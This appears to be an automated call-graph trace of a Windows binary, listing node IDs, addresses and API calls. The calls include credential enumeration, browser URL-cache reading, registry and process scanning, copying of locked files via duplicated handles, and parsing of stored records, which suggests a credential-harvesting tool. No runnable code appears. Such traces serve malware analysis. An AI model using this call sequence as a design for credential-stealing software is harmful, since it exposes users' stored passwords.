40a706 39170->39603 39179 40bdb0 39171->39179 39620 4053fe 39 API calls 39172->39620 39178->39170 39810 404363 39179->39810 39182 40bf5d 39830 40440c 39182->39830 39184 40bdee 39184->39182 39187 40b2cc 27 API calls 39184->39187 39185 40bddf CredEnumerateW 39185->39184 39233 40399d 39232->39233 39876 403a16 39233->39876 39235 403a09 39890 40b1ab free free 39235->39890 39237 4039a3 39237->39235 39241 4039f4 39237->39241 39887 40a02c CreateFileW 39237->39887 39238 403a12 wcsrchr 39238->38968 39241->39235 39242 4099c6 2 API calls 39241->39242 39242->39235 39244 414c2e 16 API calls 39243->39244 39245 404048 39244->39245 39246 414c2e 16 API calls 39245->39246 39247 404056 39246->39247 39248 409d1f 6 API calls 39247->39248 39249 404073 39248->39249 39250 409d1f 6 API calls 39249->39250 39251 40408e 39250->39251 39252 409d1f 6 API calls 39251->39252 39253 4040a6 39252->39253 39254 403af5 20 API calls 39253->39254 39255 4040ba 39254->39255 39256 403af5 20 API calls 39255->39256 39257 4040cb 39256->39257 39917 40414f memset 39257->39917 39259 404140 39931 40b1ab free free 39259->39931 39261 4040ec memset 39264 4040e0 39261->39264 39262 404148 39262->39025 39263 4099c6 2 API calls 39263->39264 39264->39259 39264->39261 39264->39263 39265 40a8ab 9 API calls 39264->39265 39265->39264 39944 40a6e6 WideCharToMultiByte 39266->39944 39318 40b633 free 39317->39318 39319 413d65 CreateToolhelp32Snapshot memset Process32FirstW 39318->39319 39320 413f00 Process32NextW 39319->39320 39321 413da5 OpenProcess 39320->39321 39322 413f17 CloseHandle 39320->39322 39323 413df3 memset 39321->39323 39328 413eb0 39321->39328 39322->39063 40183 413f27 39323->40183 39325 413ebf free 39325->39328 39326 4099f4 3 API calls 39326->39328 39328->39320 39328->39325 39328->39326 39329 413e37 GetModuleHandleW 39330 413e1f 39329->39330 39331 413e46 GetProcAddress 39329->39331 39330->39329 40188 413959 39330->40188 40204 413ca4 39330->40204 39331->39330 39333 413ea2 CloseHandle 39333->39328 39335 414c2e 16 API calls 39334->39335 39336 403eb7 39335->39336 39337 414c2e 16 API calls 39336->39337 39338 403ec5 39337->39338 39339 409d1f 6 API calls 39338->39339 39340 403ee2 39339->39340 39341 409d1f 6 API calls 39340->39341 39342 403efd 39341->39342 39343 409d1f 6 API calls 39342->39343 39344 403f15 39343->39344 39345 403af5 20 API calls 39344->39345 39346 403f29 39345->39346 39347 403af5 20 API calls 39346->39347 39348 403f3a 39347->39348 39349 40414f 33 API calls 39348->39349 39354 403f4f 39349->39354 39350 403faf 40218 40b1ab free free 39350->40218 39352 403f5b memset 39352->39354 39353 403fb7 39353->39009 39354->39350 39354->39352 39355 4099c6 2 API calls 39354->39355 39356 40a8ab 9 API calls 39354->39356 39355->39354 39356->39354 39358 414c2e 16 API calls 39357->39358 39359 403d26 39358->39359 39360 414c2e 16 API calls 39359->39360 39361 403d34 39360->39361 39362 409d1f 6 API calls 39361->39362 39363 403d51 39362->39363 39364 409d1f 6 API calls 39363->39364 39365 403d6c 39364->39365 39366 409d1f 6 API calls 39365->39366 39367 403d84 39366->39367 39368 403af5 20 API calls 39367->39368 39369 403d98 39368->39369 39370 403af5 20 API calls 39369->39370 39371 403da9 39370->39371 39372 40414f 33 API calls 39371->39372 39373 403dbe 39372->39373 39374 403e1e 39373->39374 39375 403dca memset 39373->39375 39378 4099c6 2 API calls 39373->39378 39379 40a8ab 9 API calls 39373->39379 40219 40b1ab free free 39374->40219 39375->39373 39377 403e26 39377->39013 39378->39373 39379->39373 39381 414b81 9 API calls 39380->39381 39382 414c40 39381->39382 39383 414c73 memset 39382->39383 40220 409cea 39382->40220 39384 414c94 39383->39384 40223 414592 RegOpenKeyExW 39384->40223 39388 414c64 39388->39003 39389 414cc1 39390 414cf4 wcscpy 39389->39390 40224 414bb0 wcscpy 39389->40224 39390->39388 39392 414cd2 40225 4145ac RegQueryValueExW 39392->40225 39394 414ce9 RegCloseKey 39394->39390 39396 409d62 39395->39396 39397 409d43 wcscpy 39395->39397 39396->39045 39398 409719 2 API calls 39397->39398 39399 409d51 wcscat 39398->39399 39399->39396 39401 40aebe FindClose 39400->39401 39402 40ae21 39401->39402 39403 4099c6 2 API calls 39402->39403 39404 40ae35 39403->39404 39405 409d1f 6 API calls 39404->39405 39406 40ae49 39405->39406 39406->39080 39408 40ade0 39407->39408 39409 40ae0f 39407->39409 39408->39409 39410 40ade7 wcscmp 39408->39410 39409->39080 39410->39409 39411 40adfe wcscmp 39410->39411 39411->39409 39413 40ae18 9 API calls 39412->39413 39419 4453c4 39413->39419 39414 40ae51 9 API calls 39414->39419 39415 4453f3 39417 40aebe FindClose 39415->39417 39416 40add4 2 API calls 39416->39419 39418 4453fe 39417->39418 39418->39080 39419->39414 39419->39415 39419->39416 39420 445403 253 API calls 39419->39420 39420->39419 39422 40ae7b FindNextFileW 39421->39422 39423 40ae5c FindFirstFileW 39421->39423 39424 40ae94 39422->39424 39425 40ae8f 39422->39425 39423->39424 39427 409d1f 6 API calls 39424->39427 39428 40aeb6 39424->39428 39426 40aebe FindClose 39425->39426 39426->39424 39427->39428 39428->39080 39431->39066 39432->39047 39434->39081 39436 409c89 39435->39436 39436->39103 39439 413d39 39438->39439 39440 413d2f FreeLibrary 39438->39440 39441 40b633 free 39439->39441 39440->39439 39442 413d42 39441->39442 39443 40b633 free 39442->39443 39444 413d4a 39443->39444 39444->38960 39445->38964 39446->39015 39447->39029 39449 44db70 39448->39449 39450 40b6fc memset 39449->39450 39451 409c70 2 API calls 39450->39451 39452 40b732 wcsrchr 39451->39452 39453 40b743 39452->39453 39454 40b746 memset 39452->39454 39453->39454 39455 40b2cc 27 API calls 39454->39455 39456 40b76f 39455->39456 39457 409d1f 6 API calls 39456->39457 39458 40b783 39457->39458 40226 409b98 GetFileAttributesW 39458->40226 39460 40b792 39461 40b7c2 39460->39461 39462 409c70 2 API calls 39460->39462 40227 40bb98 39461->40227 39464 40b7a5 39462->39464 39466 40b2cc 27 API calls 39464->39466 39469 40b7b2 39466->39469 39467 40b837 CloseHandle 39471 40b83e memset 39467->39471 39468 40b817 40261 409a45 GetTempPathW 39468->40261 39473 409d1f 6 API calls 39469->39473 40260 40a6e6 WideCharToMultiByte 39471->40260 39473->39461 39474 40b827 CopyFileW 39474->39471 39475 40b866 39476 444432 121 API calls 39475->39476 39477 40b879 39476->39477 39478 40bad5 39477->39478 39479 40b273 27 API calls 39477->39479 39480 40baeb 39478->39480 39481 40bade DeleteFileW 39478->39481 39482 40b89a 39479->39482 39483 40b04b ??3@YAXPAX 39480->39483 39481->39480 39484 438552 134 API calls 39482->39484 39485 40baf3 39483->39485 39486 40b8a4 39484->39486 39485->39039 39487 40bacd 39486->39487 39489 4251c4 137 API calls 39486->39489 39488 443d90 111 API calls 39487->39488 39488->39478 39512 40b8b8 39489->39512 39490 40bac6 40273 424f26 123 API calls 39490->40273 39491 40b8bd memset 40264 425413 17 API calls 39491->40264 39494 425413 17 API calls 39494->39512 39497 40a71b MultiByteToWideChar 39497->39512 39498 40a734 MultiByteToWideChar 39498->39512 39501 40b9b5 memcmp 39501->39512 39502 4099c6 2 API calls 39502->39512 39503 404423 37 API calls 39503->39512 39505 40bb3e memset memcpy 40274 40a734 MultiByteToWideChar 39505->40274 39506 4251c4 137 API calls 39506->39512 39509 40bb88 LocalFree 39509->39512 39512->39490 39512->39491 39512->39494 39512->39497 39512->39498 39512->39501 39512->39502 39512->39503 39512->39505 39512->39506 39513 40ba5f memcmp 39512->39513 40265 4253ef 16 API calls 39512->40265 40266 40b64c SystemTimeToFileTime FileTimeToLocalFileTime 39512->40266 40267 4253af 17 API calls 39512->40267 40268 4253cf 17 API calls 39512->40268 40269 447280 memset 39512->40269 40270 447960 memset memcpy memcpy memcpy 39512->40270 40271 40afe8 ??2@YAPAXI memcpy ??3@YAXPAX 39512->40271 40272 447920 memcpy memcpy memcpy 39512->40272 39513->39512 39514->39041 39516 40aed1 39515->39516 39517 40aec7 FindClose 39515->39517 39516->38973 39517->39516 39519 4099d7 39518->39519 39520 4099da memcpy 39518->39520 39519->39520 39520->39024 39522 40b2cc 27 API calls 39521->39522 39523 44543f 39522->39523 39524 409d1f 6 API calls 39523->39524 39525 44544f 39524->39525 40366 409b98 GetFileAttributesW 39525->40366 39527 44545e 39528 445476 39527->39528 39529 40b6ef 252 API calls 39527->39529 39530 40b2cc 27 API calls 39528->39530 39529->39528 39531 445482 39530->39531 39532 409d1f 6 API calls 39531->39532 39533 445492 39532->39533 40367 409b98 GetFileAttributesW 39533->40367 39535 4454a1 39536 4454b9 39535->39536 39537 40b6ef 252 API calls 39535->39537 39536->39055 39537->39536 39538->39054 39539->39071 39540->39077 39541->39114 39542->39096 39543->39141 39544->39141 39545->39124 39546->39152 39547->39154 39548->39156 39550 414c2e 16 API calls 39549->39550 39551 40c2ae 39550->39551 39621 40c1d3 39551->39621 39556 40c3be 39573 40a8ab 39556->39573 39557 40afcf 2 API calls 39558 40c2fd FindFirstUrlCacheEntryW 39557->39558 39559 40c3b6 39558->39559 39560 40c31e wcschr 39558->39560 39561 40b04b ??3@YAXPAX 39559->39561 39562 40c331 39560->39562 39563 40c35e FindNextUrlCacheEntryW 39560->39563 39561->39556 39564 40a8ab 9 API calls 39562->39564 39563->39560 39565 40c373 GetLastError 39563->39565 39568 40c33e wcschr 39564->39568 39566 40c3ad FindCloseUrlCache 39565->39566 39567 40c37e 39565->39567 39566->39559 39569 40afcf 2 API calls 39567->39569 39568->39563 39570 40c34f 39568->39570 39571 40c391 FindNextUrlCacheEntryW 39569->39571 39572 40a8ab 9 API calls 39570->39572 39571->39560 39571->39566 39572->39563 39737 40a97a 39573->39737 39576 40a8cc 39576->39163 39577 40a8d0 7 API calls 39577->39576 39742 40b1ab free free 39578->39742 39580 40c3dd 39581 40b2cc 27 API calls 39580->39581 39582 40c3e7 39581->39582 39743 414592 RegOpenKeyExW 39582->39743 39584 40c3f4 39585 40c50e 39584->39585 39586 40c3ff 39584->39586 39600 405337 39585->39600 39587 40a9ce 4 API calls 39586->39587 39588 40c418 memset 39587->39588 39744 40aa1d 39588->39744 39591 40c471 39593 40c47a _wcsupr 39591->39593 39592 40c505 RegCloseKey 39592->39585 39594 40a8d0 7 API calls 39593->39594 39595 40c498 39594->39595 39596 40a8d0 7 API calls 39595->39596 39597 40c4ac memset 39596->39597 39598 40aa1d 39597->39598 39599 40c4e4 RegEnumValueW 39598->39599 39599->39592 39599->39593 39746 405220 39600->39746 39604 4099c6 2 API calls 39603->39604 39605 40a714 _wcslwr 39604->39605 39606 40c634 39605->39606 39803 405361 39606->39803 39609 40c65c wcslen 39806 4053b6 39 API calls 39609->39806 39610 40c71d wcslen 39610->39170 39620->39171 39622 40ae18 9 API calls 39621->39622 39628 40c210 39622->39628 39623 40ae51 9 API calls 39623->39628 39624 40c264 39625 40aebe FindClose 39624->39625 39627 40c26f 39625->39627 39626 40add4 2 API calls 39626->39628 39633 40e5ed memset memset 39627->39633 39628->39623 39628->39624 39628->39626 39629 40c231 _wcsicmp 39628->39629 39630 40c1d3 35 API calls 39628->39630 39629->39628 39631 40c248 39629->39631 39630->39628 39646 40c084 22 API calls 39631->39646 39634 414c2e 16 API calls 39633->39634 39635 40e63f 39634->39635 39636 409d1f 6 API calls 39635->39636 39637 40e658 39636->39637 39647 409b98 GetFileAttributesW 39637->39647 39639 40e667 39640 40e680 39639->39640 39642 409d1f 6 API calls 39639->39642 39648 409b98 GetFileAttributesW 39640->39648 39642->39640 39643 40e68f 39644 40c2d8 39643->39644 39649 40e4b2 39643->39649 39644->39556 39644->39557 39646->39628 39647->39639 39648->39643 39670 40e01e 39649->39670 39651 40e593 39653 40e5b0 39651->39653 39654 40e59c DeleteFileW 39651->39654 39652 40e521 39652->39651 39693 40e175 39652->39693 39655 40b04b ??3@YAXPAX 39653->39655 39654->39653 39656 40e5bb 39655->39656 39658 40e5c4 CloseHandle 39656->39658 39659 40e5cc 39656->39659 39658->39659 39661 40b633 free 39659->39661 39660 40e573 39662 40e584 39660->39662 39663 40e57c CloseHandle 39660->39663 39664 40e5db 39661->39664 39736 40b1ab free free 39662->39736 39663->39662 39667 40b633 free 39664->39667 39666 40e540 39666->39660 39713 40e2ab 39666->39713 39668 40e5e3 39667->39668 39668->39644 39671 406214 22 API calls 39670->39671 39672 40e03c 39671->39672 39673 40e16b 39672->39673 39674 40dd85 74 API calls 39672->39674 39673->39652 39675 40e06b 39674->39675 39675->39673 39676 40afcf ??2@YAPAXI ??3@YAXPAX 39675->39676 39677 40e08d OpenProcess 39676->39677 39678 40e0a4 GetCurrentProcess DuplicateHandle 39677->39678 39682 40e152 39677->39682 39679 40e0d0 GetFileSize 39678->39679 39680 40e14a CloseHandle 39678->39680 39683 409a45 GetTempPathW GetWindowsDirectoryW GetTempFileNameW 39679->39683 39680->39682 39681 40e160 39685 40b04b ??3@YAXPAX 39681->39685 39682->39681 39684 406214 22 API calls 39682->39684 39686 40e0ea 39683->39686 39684->39681 39685->39673 39687 4096dc CreateFileW 39686->39687 39688 40e0f1 CreateFileMappingW 39687->39688 39689 40e140 CloseHandle CloseHandle 39688->39689 39690 40e10b MapViewOfFile 39688->39690 39689->39680 39691 40e13b CloseHandle 39690->39691 39692 40e11f WriteFile UnmapViewOfFile 39690->39692 39691->39689 39692->39691 39694 40e18c 39693->39694 39695 406b90 11 API calls 39694->39695 39696 40e19f 39695->39696 39697 40e1a7 memset 39696->39697 39698 40e299 39696->39698 39703 40e1e8 39697->39703 39699 4069a3 ??3@YAXPAX free 39698->39699 39700 40e2a4 39699->39700 39700->39666 39701 406e8f 13 API calls 39701->39703 39702 406b53 SetFilePointerEx ReadFile 39702->39703 39703->39701 39703->39702 39704 40e283 39703->39704 39705 40dd50 _wcsicmp 39703->39705 39709 40742e 8 API calls 39703->39709 39710 40aae3 wcslen wcslen _memicmp 39703->39710 39711 40e244 _snwprintf 39703->39711 39706 40e291 39704->39706 39707 40e288 free 39704->39707 39705->39703 39708 40aa04 free 39706->39708 39707->39706 39708->39698 39709->39703 39710->39703 39712 40a8d0 7 API calls 39711->39712 39712->39703 39714 40e2c2 39713->39714 39715 406b90 11 API calls 39714->39715 39726 40e2d3 39715->39726 39716 40e4a0 39717 4069a3 ??3@YAXPAX free 39716->39717 39719 40e4ab 39717->39719 39718 406e8f 13 API calls 39718->39726 39719->39666 39720 406b53 SetFilePointerEx ReadFile 39720->39726 39721 40e489 39722 40aa04 free 39721->39722 39724 40e491 39722->39724 39723 40dd50 _wcsicmp 39723->39726 39724->39716 39725 40e497 free 39724->39725 39725->39716 39726->39716 39726->39718 39726->39720 39726->39721 39726->39723 39727 40dd50 _wcsicmp 39726->39727 39730 40742e 8 API calls 39726->39730 39731 40e3e0 memcpy 39726->39731 39732 40e3b3 wcschr 39726->39732 39733 40e3fb memcpy 39726->39733 39734 40e416 memcpy 39726->39734 39735 40e431 memcpy 39726->39735 39728 40e376 memset 39727->39728 39729 40aa29 6 API calls 39728->39729 39729->39726 39730->39726 39731->39726 39732->39726 39733->39726 39734->39726 39735->39726 39736->39651 39739 40a980 39737->39739 39738 40a8bb 39738->39576 39738->39577 39739->39738 39740 40a995 _wcsicmp 39739->39740 39741 40a99c wcscmp 39739->39741 39740->39739 39741->39739 39742->39580 39743->39584 39745 40aa23 RegEnumValueW 39744->39745 39745->39591 39745->39592 39747 405335 39746->39747 39748 40522a 39746->39748 39747->39170 39749 40b2cc 27 API calls 39748->39749 39750 405234 39749->39750 39751 40a804 8 API calls 39750->39751 39752 40523a 39751->39752 39791 40b273 39752->39791 39754 405248 _mbscpy _mbscat GetProcAddress 39755 40b273 27 API calls 39754->39755 39756 405279 39755->39756 39794 405211 GetProcAddress 39756->39794 39792 40b58d 27 API calls 39791->39792 39793 40b18c 39792->39793 39793->39754 39804 405220 39 API calls 39803->39804 39805 405369 39804->39805 39805->39609 39805->39610 39811 40440c FreeLibrary 39810->39811 39812 40436d 39811->39812 39813 40a804 8 API calls 39812->39813 39814 404377 39813->39814 39815 404383 39814->39815 39816 404405 39814->39816 39817 40b273 27 API calls 39815->39817 39816->39182 39816->39184 39816->39185 39818 40438d GetProcAddress 39817->39818 39877 403a29 39876->39877 39891 403bed memset memset 39877->39891 39879 403ae7 39904 40b1ab free free 39879->39904 39880 403a3f memset 39886 403a2f 39880->39886 39882 403aef 39882->39237 39883 409b98 GetFileAttributesW 39883->39886 39884 40a8d0 7 API calls 39884->39886 39885 409d1f 6 API calls 39885->39886 39886->39879 39886->39880 39886->39883 39886->39884 39886->39885 39888 40a051 GetFileTime CloseHandle 39887->39888 39889 4039ca CompareFileTime 39887->39889 39888->39889 39889->39237 39890->39238 39892 414c2e 16 API calls 39891->39892 39893 403c38 39892->39893 39894 409719 2 API calls 39893->39894 39895 403c3f wcscat 39894->39895 39896 414c2e 16 API calls 39895->39896 39897 403c61 39896->39897 39898 409719 2 API calls 39897->39898 39899 403c68 wcscat 39898->39899 39905 403af5 39899->39905 39902 403af5 20 API calls 39903 403c95 39902->39903 39903->39886 39904->39882 39906 403b02 39905->39906 39907 40ae18 9 API calls 39906->39907 39915 403b37 39907->39915 39908 403bdb 39910 40aebe FindClose 39908->39910 39909 40add4 wcscmp wcscmp 39909->39915 39911 403be6 39910->39911 39911->39902 39912 40ae18 9 API calls 39912->39915 39913 40ae51 9 API calls 39913->39915 39914 40aebe FindClose 39914->39915 39915->39908 39915->39909 39915->39912 39915->39913 39915->39914 39916 40a8d0 7 API calls 39915->39916 39916->39915 39918 409d1f 6 API calls 39917->39918 39919 404190 39918->39919 39932 409b98 GetFileAttributesW 39919->39932 39921 40419c 39922 4041a7 6 API calls 39921->39922 39923 40435c 39921->39923 39924 40424f 39922->39924 39923->39264 39924->39923 39926 40425e memset 39924->39926 39928 409d1f 6 API calls 39924->39928 39929 40a8ab 9 API calls 39924->39929 39933 414842 39924->39933 39926->39924 39927 404296 wcscpy 39926->39927 39927->39924 39928->39924 39930 4042b6 memset memset _snwprintf wcscpy 39929->39930 39930->39924 39931->39262 39932->39921 39936 41443e 39933->39936 39935 414866 39935->39924 39937 41444b 39936->39937 39938 414451 39937->39938 39939 4144a3 GetPrivateProfileStringW 39937->39939 39940 414491 39938->39940 39941 414455 wcschr 39938->39941 39939->39935 39942 414495 WritePrivateProfileStringW 39940->39942 39941->39940 39943 414463 _snwprintf 39941->39943 39942->39935 39943->39942 40210 413f4f 40183->40210 40186 413f37 K32GetModuleFileNameExW 40187 413f4a 40186->40187 40187->39330 40189 413969 wcscpy 40188->40189 40190 41396c wcschr 40188->40190 40202 413a3a 40189->40202 40190->40189 40192 41398e 40190->40192 40215 4097f7 wcslen wcslen _memicmp 40192->40215 40194 41399a 40195 4139a4 memset 40194->40195 40196 4139e6 40194->40196 40216 409dd5 GetWindowsDirectoryW wcscpy 40195->40216 40198 413a31 wcscpy 40196->40198 40199 4139ec memset 40196->40199 40198->40202 40217 409dd5 GetWindowsDirectoryW wcscpy 40199->40217 40200 4139c9 wcscpy wcscat 40200->40202 40202->39330 40203 413a11 memcpy wcscat 40203->40202 40205 413cb0 GetModuleHandleW 40204->40205 40206 413cda 40204->40206 40205->40206 40207 413cbf GetProcAddress 40205->40207 40208 413ce3 GetProcessTimes 40206->40208 40209 413cf6 40206->40209 40207->40206 40208->39333 40209->39333 40211 413f2f 40210->40211 40212 413f54 40210->40212 40211->40186 40211->40187 40213 40a804 8 API calls 40212->40213 40214 413f5f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 40213->40214 40214->40211 40215->40194 40216->40200 40217->40203 40218->39353 40219->39377 40221 409cf9 GetVersionExW 40220->40221 40222 409d0a 40220->40222 40221->40222 40222->39383 40222->39388 40223->39389 40224->39392 40225->39394 40226->39460 40228 40bba5 40227->40228 40275 40cc26 40228->40275 40231 40bd4b 40296 40cc0c 40231->40296 40236 40b2cc 27 API calls 40237 40bbef 40236->40237 40303 40ccf0 _wcsicmp 40237->40303 40239 40bbf5 40239->40231 40304 40ccb4 6 API calls 40239->40304 40241 40bc26 40242 40cf04 17 API calls 40241->40242 40243 40bc2e 40242->40243 40244 40bd43 40243->40244 40245 40b2cc 27 API calls 40243->40245 40246 40cc0c 4 API calls 40244->40246 40247 40bc40 40245->40247 40246->40231 40305 40ccf0 _wcsicmp 40247->40305 40249 40bc46 40249->40244 40250 40bc61 memset memset WideCharToMultiByte 40249->40250 40306 40103c strlen 40250->40306 40252 40bcc0 40253 40b273 27 API calls 40252->40253 40254 40bcd0 memcmp 40253->40254 40254->40244 40255 40bce2 40254->40255 40256 404423 37 API calls 40255->40256 40257 40bd10 40256->40257 40257->40244 40258 40bd3a LocalFree 40257->40258 40259 40bd1f memcpy 40257->40259 40258->40244 40259->40258 40260->39475 40262 409a74 GetTempFileNameW 40261->40262 40263 409a66 GetWindowsDirectoryW 40261->40263 40262->39474 40263->40262 40264->39512 40265->39512 40266->39512 40267->39512 40268->39512 40269->39512 40270->39512 40271->39512 40272->39512 40273->39487 40274->39509 40307 4096c3 CreateFileW 40275->40307 40277 40cc34 40278 40cc3d GetFileSize 40277->40278 40286 40bbca 40277->40286 40279 40afcf 2 API calls 40278->40279 40280 40cc64 40279->40280 40308 40a2ef ReadFile 40280->40308 40282 40cc71 40309 40ab4a MultiByteToWideChar 40282->40309 40284 40cc95 CloseHandle 40285 40b04b ??3@YAXPAX 40284->40285 40285->40286 40286->40231 40287 40cf04 40286->40287 40288 40b633 free 40287->40288 40289 40cf14 40288->40289 40315 40b1ab free free 40289->40315 40291 40bbdd 40291->40231 40291->40236 40292 40cf1b 40292->40291 40294 40cfef 40292->40294 40316 40cd4b 40292->40316 40295 40cd4b 14 API calls 40294->40295 40295->40291 40297 40b633 free 40296->40297 40298 40cc15 40297->40298 40299 40aa04 free 40298->40299 40300 40cc1d 40299->40300 40365 40b1ab free free 40300->40365 40302 40b7d4 memset CreateFileW 40302->39467 40302->39468 40303->40239 40304->40241 40305->40249 40306->40252 40307->40277 40308->40282 40310 40ab6b 40309->40310 40314 40ab93 40309->40314 40311 40a9ce 4 API calls 40310->40311 40312 40ab74 40311->40312 40313 40ab7c MultiByteToWideChar 40312->40313 40313->40314 40314->40284 40315->40292 40317 40cd7b 40316->40317 40350 40aa29 40317->40350 40319 40cef5 40320 40aa04 free 40319->40320 40321 40cefd 40320->40321 40321->40292 40323 40aa29 6 API calls 40324 40ce1d 40323->40324 40325 40aa29 6 API calls 40324->40325 40326 40ce3e 40325->40326 40327 40ce6a 40326->40327 40358 40abb7 wcslen memmove 40326->40358 40328 40ce9f 40327->40328 40361 40abb7 wcslen memmove 40327->40361 40330 40a8d0 7 API calls 40328->40330 40333 40ceb5 40330->40333 40331 40ce56 40359 40aa71 wcslen 40331->40359 40339 40a8d0 7 API calls 40333->40339 40335 40ce8b 40362 40aa71 wcslen 40335->40362 40336 40ce5e 40360 40abb7 wcslen memmove 40336->40360 40342 40cecb 40339->40342 40340 40ce93 40363 40abb7 wcslen memmove 40340->40363 40364 40d00b malloc memcpy free free 40342->40364 40344 40cedd 40345 40aa04 free 40344->40345 40346 40cee5 40345->40346 40347 40aa04 free 40346->40347 40348 40ceed 40347->40348 40349 40aa04 free 40348->40349 40349->40319 40351 40aa33 40350->40351 40352 40aa63 40350->40352 40353 40aa44 40351->40353 40354 40aa38 wcslen 40351->40354 40352->40319 40352->40323 40355 40a9ce malloc memcpy free free 40353->40355 40354->40353 40356 40aa4d 40355->40356 40356->40352 40357 40aa51 memcpy 40356->40357 40357->40352 40358->40331 40359->40336 40360->40327 40361->40335 40362->40340 40363->40328 40364->40344 40365->40302 40366->39527 40367->39535 37669 44dea5 37670 44deb5 FreeLibrary 37669->37670 37671 44dec3 37669->37671 37670->37671 37854 4426a9 37859 4324d3 37854->37859 37856 4426d2 37873 431a7b 37856->37873 37858 4426e3 37860 4324e3 37859->37860 37861 4324da 37859->37861 37865 4324e8 37860->37865 37945 43240a 12 API calls 37860->37945 37941 415a91 37861->37941 37864 4324fd 37866 432513 37864->37866 37867 432508 37864->37867 37865->37856 37947 43034a 37866->37947 37946 4325ad memset 37867->37946 37869 43250e 37869->37856 37871 432548 37872 43034a memcpy 37871->37872 37872->37869 37874 431aa3 37873->37874 37930 431b2e 37873->37930 37874->37930 37952 43817e 37874->37952 37877 432116 37985 4325ad memset 37877->37985 37880 432122 37880->37858 37882 431ad5 37884 431b04 37882->37884 37882->37930 37957 42faf4 12 API calls 37882->37957 37883 431b15 37887 431baa 37883->37887 37888 431b7c memcmp 37883->37888 37883->37930 37958 42ff8c 37884->37958 37889 431bb0 37887->37889 37890 431bcb 37887->37890 37888->37887 37905 431b95 37888->37905 37967 4169a7 11 API calls 37889->37967 37893 431bd1 37890->37893 37894 431c45 37890->37894 37895 43034a memcpy 37893->37895 37969 4165ff 37894->37969 37896 431bdc 37895->37896 37896->37930 37968 430468 11 API calls 37896->37968 37899 431c65 37902 431cba 37899->37902 37899->37930 37972 42bf4c 14 API calls 37899->37972 37901 431bef 37901->37899 37901->37905 37901->37930 37903 415a91 memset 37902->37903 37906 431d17 37903->37906 37904 431ca1 37904->37930 37973 42bfcf memcpy 37904->37973 37905->37930 37966 4169a7 11 API calls 37905->37966 37907 431d27 memcpy 37906->37907 37906->37930 37915 431da8 37907->37915 37924 431e97 37907->37924 37909 431eb8 37975 4169a7 11 API calls 37909->37975 37911 431f3c 37912 431fc3 37911->37912 37913 431f45 37911->37913 37978 4397fd memset 37912->37978 37976 4172c8 memset 37913->37976 37915->37909 37917 431e12 memcpy 37915->37917 37915->37924 37915->37930 37974 430af5 16 API calls 37915->37974 37916 431fd4 37916->37930 37979 4328e4 12 API calls 37916->37979 37917->37915 37921 431feb 37980 4233ae 11 API calls 37921->37980 37923 431ffc 37926 43202e 37923->37926 37929 4165ff 11 API calls 37923->37929 37924->37911 37925 431f6a 37924->37925 37925->37930 37977 4169a7 11 API calls 37925->37977 37981 42fe8b 22 API calls 37926->37981 37929->37926 37984 42c02e memset 37930->37984 37931 432057 37931->37930 37982 431917 23 API calls 37931->37982 37933 432079 37983 430b5d 11 API calls 37933->37983 37942 415a9d 37941->37942 37943 415ab3 37942->37943 37944 415aa4 memset 37942->37944 37943->37860 37944->37943 37945->37864 37946->37869 37948 43034e 37947->37948 37950 430359 37947->37950 37951 415c23 memcpy 37948->37951 37950->37871 37951->37950 37953 438187 37952->37953 37955 431ab6 37952->37955 37986 4380f6 37953->37986 37955->37883 37955->37930 37956 43041c 12 API calls 37955->37956 37956->37882 37957->37884 37959 43817e 139 API calls 37958->37959 37961 42ff99 37959->37961 37960 42ff9d 37960->37883 37961->37960 37962 42ffe3 37961->37962 37963 42ffd0 37961->37963 38475 4169a7 11 API calls 37962->38475 38474 4169a7 11 API calls 37963->38474 37966->37930 37967->37930 37968->37901 37970 4165a0 11 API calls 37969->37970 37971 41660d 37970->37971 37971->37899 37972->37904 37973->37902 37974->37915 37975->37930 37976->37930 37977->37930 37978->37916 37979->37921 37980->37923 37981->37931 37982->37933 37984->37877 37985->37880 37988 43811f 37986->37988 37987 438164 37987->37955 37988->37987 37991 437e5e 37988->37991 38014 4300e8 memset memset memcpy 37988->38014 38015 437d3c 37991->38015 37993 437eb3 37993->37988 37994 437ea9 37994->37993 37999 437f22 37994->37999 38030 41f432 37994->38030 37997 437f06 38077 415c56 11 API calls 37997->38077 38002 437f7f 37999->38002 38078 432d4e 37999->38078 38000 437f95 38082 415c56 11 API calls 38000->38082 38002->38000 38003 43802b 38002->38003 38005 4165ff 11 API calls 38003->38005 38006 438054 38005->38006 38041 437371 38006->38041 38009 43806b 38010 438094 38009->38010 38083 42f50e 138 API calls 38009->38083 38013 437fa3 38010->38013 38084 4300e8 memset memset memcpy 38010->38084 38013->37993 38085 41f638 104 API calls 38013->38085 38014->37988 38016 437d69 38015->38016 38019 437d80 38015->38019 38098 437ccb 11 API calls 38016->38098 38018 437d76 38018->37994 38019->38018 38020 437da3 38019->38020 38022 437d90 38019->38022 38086 438460 38020->38086 38022->38018 38102 437ccb 11 API calls 38022->38102 38024 437de8 38101 424f26 123 API calls 38024->38101 38026 437dcb 38026->38024 38099 444283 13 API calls 38026->38099 38028 437dfc 38100 437ccb 11 API calls 38028->38100 38031 41f54d 38030->38031 38037 41f44f 38030->38037 38032 41f466 38031->38032 38273 41c635 memset memset 38031->38273 38032->37997 38032->37999 38037->38032 38039 41f50b 38037->38039 38244 41f1a5 38037->38244 38269 41c06f memcmp 38037->38269 38270 41f3b1 90 API calls 38037->38270 38271 41f398 86 API calls 38037->38271 38039->38031 38039->38032 38272 41c295 86 API calls 38039->38272 38042 41703f 11 API calls 38041->38042 38043 437399 38042->38043 38044 43739d 38043->38044 38046 4373ac 38043->38046 38382 4446ea 11 API calls 38044->38382 38047 416935 16 API calls 38046->38047 38048 4373ca 38047->38048 38049 438460 134 API calls 38048->38049 38058 415a91 memset 38048->38058 38061 43758f 38048->38061 38073 437584 38048->38073 38076 437d3c 135 API calls 38048->38076 38364 4251c4 38048->38364 38383 425433 13 API calls 38048->38383 38384 425413 17 API calls 38048->38384 38385 42533e 16 API calls 38048->38385 38386 42538f 16 API calls 38048->38386 38387 42453e 123 API calls 38048->38387 38049->38048 38050 4375bc 38052 415c7d 16 API calls 38050->38052 38053 4375d2 38052->38053 38075 4373a7 38053->38075 38390 4442e6 38053->38390 38056 4375e2 38056->38075 38397 444283 13 API calls 38056->38397 38058->38048 38388 42453e 123 API calls 38061->38388 38064 4375f4 38067 437620 38064->38067 38068 43760b 38064->38068 38066 43759f 38069 416935 16 API calls 38066->38069 38071 416935 16 API calls 38067->38071 38398 444283 13 API calls 38068->38398 38069->38073 38071->38075 38073->38050 38389 42453e 123 API calls 38073->38389 38074 437612 